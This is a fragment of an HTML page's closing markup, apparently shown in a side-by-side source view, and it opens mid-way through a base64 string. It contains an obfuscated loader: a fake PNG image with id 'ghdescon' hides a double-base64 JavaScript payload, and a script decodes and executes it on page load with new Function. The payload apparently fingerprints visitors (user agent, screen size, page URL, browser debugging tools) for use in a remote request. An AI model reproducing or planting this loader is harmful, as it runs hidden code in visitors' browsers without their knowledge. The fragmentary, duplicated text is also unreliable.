WlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/> 745<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
746<script type="text/javascript"> 746<script type="text/javascript">
747if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain}; 747if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
748setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500); 748setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500);
749</script> 749</script>
750</div> 750</div>
751 751
752</body> 752</body>
753 753
754 754
755 755
756</html> 756</html>